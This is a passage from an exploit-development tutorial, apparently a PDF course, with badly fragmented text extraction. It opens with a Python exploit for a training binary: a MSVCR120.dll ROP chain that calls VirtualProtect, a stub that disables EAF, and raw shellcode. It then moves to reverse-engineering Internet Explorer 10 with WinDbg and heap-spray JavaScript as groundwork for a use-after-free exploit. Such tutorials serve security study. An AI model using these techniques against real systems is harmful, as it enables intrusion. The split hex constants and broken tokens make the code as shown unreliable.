{PAGE_EXECUTE_READ}
 
        
0x11111111
,
 
        
md
 
+
 
0x7048f607
,
     
# RETN (ROP NOP) [MSVCR120.dll]
 
        
0x11111111
,
          
# f
or RETN 0x04
 
 
# edx = args
 
        
md
 
+
 
0x704f2487
,
     
# MOV EAX,ECX # RETN    ** [MSVCR120.dll] **   |   {PAGE_EXECUTE_READ}
 
        
md
 
+
 
0x7053fe65
,
     
# SUB EAX,2 # POP EBP # RETN    ** [MSVCR120.dll] **   |   {PAGE_EXECUTE_READ}
 
        
0x11
111111
,
 
        
md
 
+
 
0x7053fe65
,
     
# SUB EAX,2 # POP EBP # RETN    ** [MSVCR120.dll] **   |   {PAGE_EXECUTE_READ}
 
        
0x11111111
,
 
        
md
 
+
 
0x7053fe65
,
     
# SUB EAX,2 # POP EBP # RETN    ** [MSVCR120.dll] **   |   {PAGE_EXECUTE_READ}
 
        
0x11
111111
,
 
        
md
 
+
 
0x7053fe65
,
     
# SUB EAX,2 # POP EBP # RETN    ** [MSVCR120.dll] **   |   {PAGE_EXECUTE_READ}
 
        
0x11111111
,
 
        
md
 
+
 
0x704846b4
,
     
# XCHG EAX,EDX # RETN    ** [MSVCR120.dll] **   |   {PAGE_EXECUTE_READ}
 
 
# EAX = n
tdll!RtlExitUserThread
 
        
md
 
+
 
0x7053b8fb
,
     
# POP EAX # RETN    ** [MSVCR120.dll] **   |   {PAGE_EXECUTE_READ}
 
        
md
 
+
 
0x7056507c
,
     
# IAT: &ntdll!RtlExitUserThread
 
        
md
 
+
 
0x70501e19
,
     
# MOV EAX,DWORD PTR [EAX] # POP ESI # POP EBP #
 RETN    ** [MSVCR120.dll] **   |  
asciiprint,ascii {PAGE_EXECUTE_READ}
 
        
0x11111111
,
 
        
0x11111111
,
 
 
# EAX = ntdll!NtQueryInformationThread
 
        
md
 
+
 
0x7049178a
,
     
# ADD EAX,8 # RETN    ** [MSVCR120.dll] **   |   {PAGE_EXECUTE_REA
D}
 
        
md
 
+
 
0x7049178a
,
     
# ADD EAX,8 # RETN    ** [MSVCR120.dll] **   |   {PAGE_EXECUTE_READ}
 
        
md
 
+
 
0x7049178a
,
     
# ADD EAX,8 # RETN    ** [MSVCR120.dll] **   |   {PAGE_EXECUTE_READ}
 
        
md
 
+
 
0x704a691c
,
     
# ADD EAX,DWORD PTR [EAX] # 
RETN    ** [MSVCR120.dll] **   |  asciiprint,ascii 
{PAGE_EXECUTE_READ}
 
        
md
 
+
 
0x704ecd87
,
     
# ADD EAX,4 # POP ESI # POP EBP # RETN 0x04    ** [MSVCR120.dll] **   |   
{PAGE_EXECUTE_READ}
 
        
0x11111111
,
 
        
0x11111111
,
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 286 
-
 
        
md
 
+
 
0x7048f60
7
,
     
# RETN (ROP NOP) [MSVCR120.dll]
 
        
0x11111111
,
          
# for RETN 0x04
 
 
# EAX 
-
> "call dword ptr fs:[0C0h] # add esp,4 # ret 14h"
 
        
md
 
+
 
0x7049178a
,
     
# ADD EAX,8 # RETN    ** [MSVCR120.dll] **   |   {PAGE_EXECUTE_READ}
 
      
md
 
+
 
0x704aa20f
,
     
# INC EAX # RETN    ** [MSVCR120.dll] **   |   {PAGE_EXECUTE_READ}
 
        
md
 
+
 
0x704aa20f
,
     
# INC EAX # RETN    ** [MSVCR120.dll] **   |   {PAGE_EXECUTE_READ}
 
        
md
 
+
 
0x704aa20f
,
     
# INC EAX # RETN    ** [MSVCR120.dll] ** 
  |   {PAGE_EXECUTE_READ}
 
 
# EBX 
-
> "call dword ptr fs:[0C0h] # add esp,4 # ret 14h"
 
        
md
 
+
 
0x704819e8
,
     
# XCHG EAX,EBX # RETN    ** [MSVCR120.dll] **   |   {PAGE_EXECUTE_READ}
 
 
# ECX = 0; EAX = 0x4d
 
        
md
 
+
 
0x704f2485
,
     
# XOR ECX,ECX # MOV EAX,ECX # RETN    ** [MSVCR120.dll] **   |   {PAGE_EXECUTE_READ}
 
        
md
 
+
 
0x7053b8fb
,
     
# POP EAX # RETN    ** [MSVCR120.dll] **   |   {PAGE_EXECUTE_READ}
 
        
0x4d
,
 
 
md
 
+
 
0x704c0a08
,
     
# JMP EBX
 
        
md
 
+
 
0x7055a
df3
,
     
# JMP ESP
 
        
0x11111111
,
          
# for RETN 0x14
 
        
0x11111111
,
          
# for RETN 0x14
 
        
0x11111111
,
          
# for RETN 0x14
 
        
0x11111111
,
          
# for RETN 0x14
 
        
0x11111111
,
          
# for RETN 0x14
 
 
# real
_code:
 
        
0x90901eeb
,
          
# jmp skip
 
 
# args:
 
        
0xffffffff
,
          
# current process handle
 
        
0x11111111
,
          
# &address = ptr to address
 
        
0x11111111
,
          
# &size = ptr to size
 
        
0x40
,
 
        
md
 
+
 
0x7056
58f2
,
     
# &Writable location [MSVCR120.dll]
 
    
# end_args:
 
        
0x11111111
,
          
# address     <
-------
 the region starts here
 
        
code_size
 
+
 
8
        
# size
 
    
# skip:
 
    
]
 
    
return
 
''
.
join
(
struct
.
pack
(
'<I'
,
 
_
)
 
for
 
_
 
in
 
rop_gadgets
)
 
 
def
 
write_file
(
file_path
):
 
    
with
 
open
(
file_path
,
 
'wb'
)
 
as
 
f
:
 
        
ret_eip
 
=
 
md
 
+
 
0x7048f607
       
# RETN (ROP NOP) [MSVCR120.dll]
 
        
shellcode
 
=
 
(
 
            
"
\
xe8
\
xff
\
xff
\
xff
\
xff
\
xc0
\
x5f
\
xb9
\
x11
\
x03
\
x02
\
x02
\
x81
\
xf1
\
x02
\
x02"
 
+
 
            
"
\
x0
2
\
x02
\
x83
\
xc7
\
x1d
\
x33
\
xf6
\
xfc
\
x8a
\
x07
\
x3c
\
x02
\
x0f
\
x44
\
xc6
\
xaa"
 
+
 
            
"
\
xe2
\
xf6
\
x55
\
x8b
\
xec
\
x83
\
xec
\
x0c
\
x56
\
x57
\
xb9
\
x7f
\
xc0
\
xb4
\
x7b
\
xe8"
 
+
 
            
"
\
x55
\
x02
\
x02
\
x02
\
xb9
\
xe0
\
x53
\
x31
\
x4b
\
x8b
\
xf8
\
xe8
\
x49
\
x02
\
x02
\
x02"
 
+
 
            
"
\
x8b
\
xf0
\
xc7
\
x45
\
xf4
\
x63
\
x61
\
x6c
\
x63
\
x6a
\
x05
\
x8d
\
x45
\
xf4
\
xc7
\
x45"
 
+
 
            
"
\
xf8
\
x2e
\
x65
\
x78
\
x65
\
x50
\
xc6
\
x45
\
xfc
\
x02
\
xff
\
xd7
\
x6a
\
x02
\
xff
\
xd6"
 
+
 
            
"
\
x5f
\
x33
\
xc0
\
x5e
\
x8b
\
xe5
\
x5d
\
xc3
\
x33
\
xd2
\
xeb
\
x10
\
xc1
\
xca
\
x0d
\
x3c"
 
+
 
            
"
\
x61
\
x0f
\
xbe
\
xc0
\
x7c
\
x03
\
x83
\
xe8
\
x20
\
x03
\
xd0
\
x41
\
x8a
\
x01
\
x84
\
xc0"
 
+
 
            
"
\
x75
\
xea
\
x8b
\
xc2
\
xc3
\
x8d
\
x41
\
xf8
\
xc3
\
x55
\
x8b
\
xec
\
x83
\
xec
\
x14
\
x53"
 
+
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 287 
-
 
            
"
\
x56
\
x57
\
x89
\
x4d
\
xf4
\
x64
\
xa1
\
x30
\
x02
\
x02
\
x02
\
x89
\
x45
\
xfc
\
x8b
\
x45"
 
+
 
            
"
\
xfc
\
x8b
\
x40
\
x0c
\
x8b
\
x40
\
x14
\
x8b
\
xf8
\
x89
\
x
45
\
xec
\
x8b
\
xcf
\
xe8
\
xd2"
 
+
 
            
"
\
xff
\
xff
\
xff
\
x8b
\
x3f
\
x8b
\
x70
\
x18
\
x85
\
xf6
\
x74
\
x4f
\
x8b
\
x46
\
x3c
\
x8b"
 
+
 
            
"
\
x5c
\
x30
\
x78
\
x85
\
xdb
\
x74
\
x44
\
x8b
\
x4c
\
x33
\
x0c
\
x03
\
xce
\
xe8
\
x96
\
xff"
 
+
 
            
"
\
xff
\
xff
\
x8b
\
x4c
\
x33
\
x20
\
x89
\
x45
\
xf8
\
x03
\
xce
\
x33
\
xc0
\
x8
9
\
x4d
\
xf0"
 
+
 
            
"
\
x89
\
x45
\
xfc
\
x39
\
x44
\
x33
\
x18
\
x76
\
x22
\
x8b
\
x0c
\
x81
\
x03
\
xce
\
xe8
\
x75"
 
+
 
            
"
\
xff
\
xff
\
xff
\
x03
\
x45
\
xf8
\
x39
\
x45
\
xf4
\
x74
\
x1e
\
x8b
\
x45
\
xfc
\
x8b
\
x4d"
 
+
 
            
"
\
xf0
\
x40
\
x89
\
x45
\
xfc
\
x3b
\
x44
\
x33
\
x18
\
x72
\
xde
\
x3b
\
x7d
\
xec
\
x75
\
x9c"
 
+
 
            
"
\
x33
\
xc0
\
x5f
\
x5e
\
x5b
\
x8b
\
xe5
\
x5d
\
xc3
\
x8b
\
x4d
\
xfc
\
x8b
\
x44
\
x33
\
x24"
 
+
 
            
"
\
x8d
\
x04
\
x48
\
x0f
\
xb7
\
x0c
\
x30
\
x8b
\
x44
\
x33
\
x1c
\
x8d
\
x04
\
x88
\
x8b
\
x04"
 
+
 
            
"
\
x30
\
x03
\
xc6
\
xeb
\
xdd"
)
 
        
disable_EAF
 
=
 
(
 
            
"
\
xB8
\
x50
\
x01
\
x00
\
x00"
 
+
            
# mov    eax,150h
 
            
"
\
x33
\
xC9"
 
+
                        
# xor    ecx,ecx
 
            
"
\
x81
\
xEC
\
xCC
\
x02
\
x00
\
x00"
 
+
        
# sub    esp,2CCh
 
            
"
\
xC7
\
x04
\
x24
\
x10
\
x00
\
x01
\
x00"
 
+
    
# mov    dword ptr [esp],10010h
 
            
"
\
x89
\
x4C
\
x24
\
x04"
 
+
                
# mov    dword ptr [esp+4],ecx
 
            
"
\
x89
\
x4C
\
x24
\
x08"
 
+
                
# mov    dword ptr [esp+8],ecx
 
            
"
\
x89
\
x4C
\
x24
\
x0C"
 
+
                
# mov    dword ptr [esp+0Ch],ecx
 
            
"
\
x89
\
x4C
\
x24
\
x10"
 
+
                
# mov    dword ptr [esp+10h],ecx
 
            
"
\
x89
\
x4C
\
x24
\
x14"
 
+
                
# mov    dword ptr [esp+14h],ecx
 
            
"
\
x89
\
x4C
\
x24
\
x18"
 
+
                
# mov    dword ptr [esp+18h],ecx
 
            
"
\
x54"
 
+
                       
     
# push   esp
 
            
"
\
x6A
\
xFE"
 
+
                        
# push   0FFFFFFFEh
 
            
"
\
x8B
\
xD4"
 
+
                        
# mov    edx,esp
 
            
"
\
x64
\
xFF
\
x15
\
xC0
\
x00
\
x00
\
x00"
 
+
    
# call   dword ptr fs:[0C0h]
 
            
"
\
x81
\
xC4
\
xD8
\
x0
2
\
x00
\
x00"
          
# add    esp,2D8h
 
        
)
 
        
code
 
=
 
disable_EAF
 
+
 
shellcode
 
        
name
 
=
 
'a'
*
36
 
+
 
struct
.
pack
(
'<I'
,
 
ret_eip
)
 
+
 
create_rop_chain
(
len
(
code
))
 
+
 
code
 
        
f
.
write
(
name
)
 
 
write_file
(
r'c:
\
deleteme
\
name.dat'
)
 
 
The first part of th
e ROP chain initializes the arguments which are located at the end of the ROP chain itself:
 
Python
 
 
# real_code:
 
        
0x90901eeb
,
          
# jmp skip
 
 
# args:
 
        
0xffffffff
,
          
# current process handle
 
        
0x11111111
,
          
# 
&address = ptr to address
 
        
0x11111111
,
          
# &size = ptr to size
 
        
0x40
,
 
        
md
 
+
 
0x705658f2
,
     
# &Writable location [MSVCR120.dll]
 
    
# end_args:
 
        
0x11111111
,
          
# address     <
-------
 the region starts here
 
        
c
ode_size
 
+
 
8
        
# size
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 288 
-
 
The second argument (
&address
) is overwritten with 
end_args
 and the third argument (
&size
) with 
end_args 
+ 4
. To conclude, 
address
 (at 
end_args
) is overwritten with its address (
end_args
).
 
Note that our code starts at 
real_code
,
 so we should overwrite 
address
 with real_code, but there’s no need 
because 
VirtualProtect
 works with pages and it’s highly probable that 
real_code
 and 
end_args
 point to the 
same page.
 
The second part of the ROP chain finds 
call dword ptr fs:[0C0h] # add e
sp,4 # ret 14h
 in 
ntdll.dll
 and make 
the call to the kernel service.
 
First run the Python script to create the file 
name.dat
 and, finally, run 
exploitme3.exe
. The exploit should 
work just fine!
 
Now you may enable all the protections (except for ASR, which 
doesn’t apply) and verify that our exploit still 
works!
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 289 
-
 
IE10: Reverse Engineering IE
 
 
For this exploit I’m using a 
VirtualBox
 VM with 
Windows 7 64
-
bit SP1
 and the version of 
Internet Explorer 10
 
downloaded from 
here
.
 
To successfully exploit IE 1
0 we need to defeat both 
ASLR
 and 
DEP
. We’re going to exploit a 
UAF
 to modify 
the length of an array so that we can read and write through the whole process address space. The ability of 
reading/writing wherever we want is a very powerful capability. From 
there we can go two ways:
 
1
.
 
Run 
ActiveX
 objects (
God mode
)
 
2
.
 
Execute regular shellcode
 
For the phase UAF 
→ 
arbitrary read/write
 we’re going to use a method described 
h
ere
.
 
Reading that paper is not enough to fully understand the method because some details are missing and I 
also found some differences between theory and practice.
 
My goal is not to simply describe a method, but to show all the work involved in the creat
ion of a complete 
exploit. The first step is to do a little investigation with WinDbg and discover how arrays and other objects 
are laid out in memory.
 
Reverse Engineering IE
 
Some objects we want to analyze are:
 

 
Array
 

 
LargeHeapBlock
 

 
ArrayBuffer
 

 
Int32Array
 
Setting up WinDbg
 
By now you should already have become familiar with WinDbg and set it up appropriately, but let’s make 
sure. First, load WinDbg (always the 
32
-
bit
 version, 
as administrator
), press 
CTRL
-
S
 and enter the 
symbol 
path
. For instance, here’s mi
ne:
 
SRV*C:
\
WinDbgSymbols*http://msdl.microsoft.com/download/symbols
 
Remember that the first part is the local directory for caching the symbols downloaded from the server.
 
Hit 
OK
 and then save the workspace by clicking on 
File
→
Save Workspace
.
 
Now run Internet Explorer 10 and in WinDbg hit 
F6
 to 
Attach to process
. You’ll see that 
iexplore.exe
 appears 
twice in the list. The first instance of 
iexplore.exe
 is the main process whereas the second is the process 
associated with the fi
rst 
tab
 opened in IE. If you open other tabs, you’ll see more instances of the same 
process. Select the second instance like shown in the picture below:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 290 
-
 
 
This is the layout I use for WinDbg:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 291 
-
 
 
Set the windows the way you like and then save the workspace again.
 
Ar
ray
 
Let’s start with the object 
Array
. Create an html file with the following code:
 
XHTML
 
 
<html>
 
<head>
 
<script
 language=
"javascript"
>
 
  
alert
(
"Start"
);
 
  
var
 
a
 
=
 
new
 
Array
(
0x123
);
 
  
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
0x123
;
 
++
i
)
 
    
a
[
i
]
 
=
 
0x111
;
 
  
alert
(
"Done"
);
 
</scr
ipt>
 
</head>
 
<body>
 
</body>
 
</html>
 
 
Open the file in IE, allow blocked content, and when the dialog box with the text 
Start
 pops up run WinDbg, 
hit 
F6
 and attach the debugger to the second instance of 
iexplore.exe
 like you did before. Hit 
F5
 (go) to 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 292 
-
 
resum
e execution and close the dialog box in IE. Now you should be seeing the second dialog with the 
message 
Done
.
 
Go back in WinDbg and try to search the memory for the content of the array. As you can see by looking at 
the source code, the array contains a se
quence of 
0x111
. Here’s what we get:
 
0:004> s
-
d 0 L?ffffffff 111 111 111 111
 
We got nothing! How odd... But even if we had found the array in memory, that wouldn’t have been enough 
to locate the code which does the actual allocation. We need a smarter way.
 
W
hy don’t we spray the heap? Let’s change the code:
 
XHTML
 
 
<html>
 
<head>
 
<script
 language=
"javascript"
>
 
  
alert
(
"Start"
);
 
  
var
 
a
 
=
 
new
 
Array
();
 
  
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
0x10000
;
 
++
i
)
 
{
 
    
a
[
i
]
 
=
 
new
 
Array
(
0x1000
/
4
);
     
// 0x1000 bytes = 0x1000/4 dwords
 
    
for
 
(
var
 
j
 
=
 
0
;
 
j
 
<
 
a
[
i
].
length
;
 
++
j
)
 
      
a
[
i
][
j
]
 
=
 
0x111
;
 
  
}
 
  
alert
(
"Done"
);
 
</script>
 
</head>
 
<body>
 
</body>
 
</html
 
 
After updating the html file, resume the execution in WinDbg (
F5
), close the 
Done
 dialog box in IE and 
reload the page (
F5
). Close th
e dialog box (
Start
) and wait for the next dialog box to appear. Now let’s have 
a look at IE’s memory usage by opening the 
Task Manager
:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 293 
-
 
 
We allocated about 
550 MB
. We can use an application called 
VMMap
 (
download
) to get a graphical 
depiction of our 
heap spray
.
 
Open VMMap and select the right instance of
 iexplo
re.exe
 as shown in the picture below:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 294 
-
 
 
Now go to 
View
→
Fragmentation View
. You’ll see something like this:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 295 
-
 
 
The area in yellow is the memory allocated through the heap spray. Let’s try to analyze the memory at the 
address 
0x1ffd0000
, which is in the middle of our
 data:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 296 
-
 
 
Let’s make it sure that this is indeed one of our arrays by modifying the code a bit:
 
XHTML
 
 
<html>
 
<head>
 
<script
 language
=
"javascript"
>
 
  
alert
(
"Start"
);
 
  
var
 
a
 
=
 
new
 
Array
();
 
  
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
0x10000
;
 
++
i
)
 
{
 
    
a
[
i
]
 
=
 
new
 
Array
(
0x1234
/
4
);
     
// 0x1234/4 = 0x48d
 
    
for
 
(
var
 
j
 
=
 
0
;
 
j
 
<
 
a
[
i
].
length
;
 
++
j
)
 
      
a
[
i
][
j
]
 
=
 
0x123
;
 
  
}
 
  
alert
(
"Done"
);
 
</script>
 
</head>
 
<b
ody>
 
</body>
 
</html>
 
 
We repeat the process and here’s the result:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 297 
-
 
 
As we can see, now the array contains the values 
0x247
. Let’s t
ry something different:
 
XHTML
 
 
<html>
 
<head>
 
<script
 language=
"javascript"
>
 
  
alert
(
"Start"
);
 
  
var
 
a
 
=
 
new
 
Array
();
 
  
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
0x10000
;
 
++
i
)
 
{
 
    
a
[
i
]
 
=
 
new
 
Array
(
0x1000
/
4
);
 
    
for
 
(
var
 
j
 
=
 
0
;
 
j
 
<
 
a
[
i
].
length
;
 
++
j
)
 
      
a
[
i
][
j
]
 
=
 
j
;
 
  
}
 
  
al
ert
(
"Done"
);
 
</script>
 
</head>
 
<body>
 
</body>
 
</html>
 
 
Now we get the following:
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 298 
-
 
 
Now the array contains the odd numbers starting w
ith 
1
. We know that our array contains the numbers
 
1 2 3 4 5 6 7 8 9 ...
 
but we get
 
3 5 7 9 11 13 15 17 19 ...
 
It’s clear that the number 
n
 is represented as 
n*2 + 1
. Why is that? You should know that an array can also 
contain references to objects so ther
e must be a way to tell integers and addresses apart. Since addresses 
are multiple of 
4
, by representing any integer as an odd number, it’ll never be confused with a reference. But 
what about a number such as 
0x7fffffff
 which is the biggest positive number
 in 
2
-
complement
? Let’s 
experiment a bit:
 
XHTML
 
 
<html>
 
<head>
 
<script
 language=
"javascript"
>
 
  
alert
(
"Start"
);
 
  
var
 
a
 
=
 
new
 
Array
();
 
  
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
0x10000
;
 
++
i
)
 
{
 
    
a
[
i
]
 
=
 
new
 
Array
(
0x1000
/
4
);
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 299 
-
 
    
a
[
i
][
0
]
 
=
 
0x7fffffff
;
 
    
a
[
i
][
1
]
 
=
 
-
2
;
 
    
a
[
i
][
2
]
 
=
 
1.2345
;
 
    
a
[
i
][
3
]
 
=
 
document.createElement
(
"div"
);
 
  
}
 
  
alert
(
"Done"
);
 
</script>
 
</head>
 
<body>
 
</body>
 
</html>
 
 
Here’s what our array looks like now:
 
 
The number 
0x7fffffff
 is too big to be stored directly so, instead, IE stores a reference to a 
JavascriptNumber
 
object. The number 
-
2
 is stored directly because it can’t be confused with an address, having its highest bit 
set
.
 
As you should know by now, the first dword of an object is usually a pointer to its 
vftable
. As you can see 
from the picture above, this is useful to determine the identity of an object.
 
Now let’s find out what code allocates the array. We can see that t
here are probably two headers:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 300 
-
 
 
The first header tells us that the allocated block is 
0x1010
 bytes. Indeed, the allocated block has
 0x10 bytes 
of header and 
0x1000
 bytes of actual data. Because we know that one of our array we’ll be at the address 
0x1ffd0000
, we can put hardware breakpoints (on write) on fields of both headers. This way we can find out 
both what code allocates the blo
ck and what code creates the object.
 
First reload the page and stop at the 
Start
 dialog box. Go to WinDbg and stop the execution (
CTRL+Break
). 
Now set the two breakpoints:
 
0:004> ba w4 1ffd0000+4
 
0:004> ba w4 1ffd0000+14
 
0:004> bl
 
 0 e 1ffd0004 w 4 0001 (0
001)  0:****
 
 1 e 1ffd0014 w 4 0001 (0001)  0:****
 
Hit 
F5
 (ignore the error messages) and close the dialog box in IE. When the first breakpoint is triggered, 
display the stack:
 
0:007> k 20
 
ChildEBP RetAddr  
 
0671bb30 6ea572d8 jscript9!Recycler::LargeAlloc+
0xa1      <
----------------------
 
0671bb4c 6eb02c47 jscript9!Recycler::AllocZero+0x91       <
----------------------
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 301 
-
 
0671bb8c 6ea82aae jscript9!Js::JavascriptArray::DirectSetItem_Full+0x3fd     <
-----------------
 (*)
 
0671bc14 05f2074b jscript9!Js::Javascrip
tOperators::OP_SetElementI+0x1e0
 
WARNING: Frame IP not in any known module. Following frames may be wrong.
 
0671bc48 6ea77461 0x5f2074b
 
0671bde4 6ea55cf5 jscript9!Js::InterpreterStackFrame::Process+0x4b47
 
0671bf2c 05f80fe9 jscript9!Js::InterpreterStackFrame
::InterpreterThunk<1>+0x305
 
0671bf38 6ea51f60 0x5f80fe9
 
0671bfb8 6ea520ca jscript9!Js::JavascriptFunction::CallRootFunction+0x140
 
0671bfd0 6ea5209f jscript9!Js::JavascriptFunction::CallRootFunction+0x19
 
0671c018 6ea52027 jscript9!ScriptSite::CallRootFuncti
on+0x40
 
0671c040 6eafdf75 jscript9!ScriptSite::Execute+0x61
 
0671c0cc 6eafdb57 jscript9!ScriptEngine::ExecutePendingScripts+0x1e9
 
0671c154 6eafe0b7 jscript9!ScriptEngine::ParseScriptTextCore+0x2ad
 
0671c1a8 069cb60c jscript9!ScriptEngine::ParseScriptText+0x5
b
 
0671c1e0 069c945d MSHTML!CActiveScriptHolder::ParseScriptText+0x42
 
0671c230 069bb52f MSHTML!CJScript9Holder::ParseScriptText+0x58
 
0671c2a4 069cc6a4 MSHTML!CScriptCollection::ParseScriptText+0x1f0
 
0671c394 069cc242 MSHTML!CScriptData::CommitCode+0x36e
 
067
1c40c 069cbe6e MSHTML!CScriptData::Execute+0x233
 
0671c420 069c9b49 MSHTML!CHtmScriptParseCtx::Execute+0x89
 
0671c498 067d77cc MSHTML!CHtmParseBase::Execute+0x17c
 
0671c4c4 755862fa MSHTML!CHtmPost::Broadcast+0x88
 
0671c5c4 069c3273 user32!InternalCallWinProc+
0x23
 
0671c5dc 069c31ff MSHTML!CHtmPost::Run+0x1c
 
0671c5f4 069c34f3 MSHTML!PostManExecute+0x5f
 
0671c610 069c34b2 MSHTML!PostManResume+0x7b
 
0671c650 06830dc9 MSHTML!CHtmPost::OnDwnChanCallback+0x3a
 
0671c660 0677866c MSHTML!CDwnChan::OnMethodCall+0x19
 
0671c6b
4 067784fa MSHTML!GlobalWndOnMethodCall+0x169
 
0671c700 755862fa MSHTML!GlobalWndProc+0xd7
 
0671c72c 75586d3a user32!InternalCallWinProc+0x23
 
We can see three things:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 302 
-
 
1
.
 
IE uses a custom allocator.
 
2
.
 
The array is of type 
jscript9!Js::JavascriptArray
.
 
3
.
 
The block is
 probably allocated when we set the value of the first item of the array (*).
 
Let’s return from the current call with 
Shift+F11
. We land here:
 
6e9e72ce 6a00            push    0
 
6e9e72d0 50              push    eax
 
6e9e72d1 51              push    ecx
 
6e9e
72d2 56              push    esi
 
6e9e72d3 e80f34ffff      call    jscript9!Recycler::LargeAlloc (6e9da6e7)
 
6e9e72d8 c70000000000    mov     dword ptr [eax],0    ds:002b:1ffd0010=00000000    <
-----
 we are here
 
6e9e72de 5e              pop     esi
 
6e9e72df 5
d              pop     ebp
 
6e9e72e0 c20400          ret     4
 
Let’s hit 
Shift+F11
 again:
 
6ea92c3f 51              push    ecx
 
6ea92c40 8bca            mov     ecx,edx
 
6ea92c42 e89a67f4ff      call    jscript9!Recycler::AllocZero (6e9d93e1)
 
6ea92c47 8b55e8 
         mov     edx,dword ptr [ebp
-
18h] ss:002b:04d2c058=04d2c054  <
-----
 we are here
 
6ea92c4a 8b0a            mov     ecx,dword ptr [edx]
 
6ea92c4c c70000000000    mov     dword ptr [eax],0
 
EAX
 points to the buffer, so we can put a breakpoint on 
6ea92c47
.
 First let’s write the address of 
EIP
 so that 
it doesn’t depend on the specific base address of the module. First of all we’re in 
jscript9
, as we can see 
from this:
 
0:007> !address @eip
 
 
Mapping file section regions...
 
Mapping module regions...
 
Mapping PEB regions...
 
Mapping TEB and stack regions...
 
Mapping heap regions...
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 303 
-
 
Mapping page heap regions...
 
Mapping other regions...
 
Mapping stack trace database regions...
 
Mapping activation context regions...
 
 
Usage:         
         Image
 
Base Address:           6e9d1000
 
End Address:            6ec54000
 
Region Size:            00283000
 
State:                  00001000  MEM_COMMIT
 
Protect:                00000020  PAGE_EXECUTE_READ
 
Type:                   01000000  MEM_IMAGE
 
A
llocation Base:        6e9d0000
 
Allocation Protect:     00000080  PAGE_EXECUTE_WRITECOPY
 
Image Path:             C:
\
Windows
\
SysWOW64
\
jscript9.dll
 
Module Name:            jscript9        <
-----------------------------------------
 
Loaded Image Name:      C:
\
Windows
\
SysWOW64
\
jscript9.dll
 
Mapped Image Name:      
 
More info:              lmv m jscript9
 
More info:              !lmi jscript9
 
More info:              ln 0x6ea92c47
 
More info:              !dh 0x6e9d0000
 
 
Unloaded modules that overlapped the address i
n the past:
 
    BaseAddr  EndAddr     Size
 
    6ea90000 6ebed000   15d000 VBoxOGL
-
x86.dll
 
    6e9b0000 6eb0d000   15d000 VBoxOGL
-
x86.dll
 
 
Unloaded modules that overlapped the region in the past:
 
    BaseAddr  EndAddr     Size
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 304 
-
 
    6ebf0000 6eccb000    db00
0 wined3dwddm
-
x86.dll
 
    6ea90000 6ebed000   15d000 VBoxOGL
-
x86.dll
 
    6e940000 6ea84000   144000 VBoxOGLcrutil
-
x86.dll
 
    6eb10000 6ebeb000    db000 wined3dwddm
-
x86.dll
 
    6e9b0000 6eb0d000   15d000 VBoxOGL
-
x86.dll
 
So, the 
RVA
 is the following:
 
0:007>
 ? @eip
-
jscript9
 
Evaluate expression: 797767 = 000c2c47
 
The creation of the array (its data, to be exact) can be logged with the following breakpoint:
 
bp jscript9+c2c47 ".printf 
\
"new Array Data: addr = 0x%p
\
\
n
\
",eax;g"
 
Note that we need to escape the doub
le quotes and the back slash because we’re already inside a string. 
Also, the command 
g
 (go) is used to resume the execution after the breakpoint is triggered, because we 
want to print a message without stopping the execution.
 
Let’s get back to what we wer
e doing. We set two hardware breakpoints and only the first was triggered, so 
let’s get going. After we hit 
F5
 one more time, the second breakpoint is triggered and the stack looks like 
this:
 
0:007> k 20
 
ChildEBP RetAddr  
 
0671bb8c 6ea82aae jscript9!Js::Ja
vascriptArray::DirectSetItem_Full+0x40b    <
----------------
 
0671bc14 05f2074b jscript9!Js::JavascriptOperators::OP_SetElementI+0x1e0
 
WARNING: Frame IP not in any known module. Following frames may be wrong.
 
0671bc48 6ea77461 0x5f2074b
 
0671bde4 6ea55cf5 js
cript9!Js::InterpreterStackFrame::Process+0x4b47
 
0671bf2c 05f80fe9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x305
 
0671bf38 6ea51f60 0x5f80fe9
 
0671bfb8 6ea520ca jscript9!Js::JavascriptFunction::CallRootFunction+0x140
 
0671bfd0 6ea5209f jscript
9!Js::JavascriptFunction::CallRootFunction+0x19
 
0671c018 6ea52027 jscript9!ScriptSite::CallRootFunction+0x40
 
0671c040 6eafdf75 jscript9!ScriptSite::Execute+0x61
 
0671c0cc 6eafdb57 jscript9!ScriptEngine::ExecutePendingScripts+0x1e9
 
exploiT DevelopmenT CommuniTy
 
 
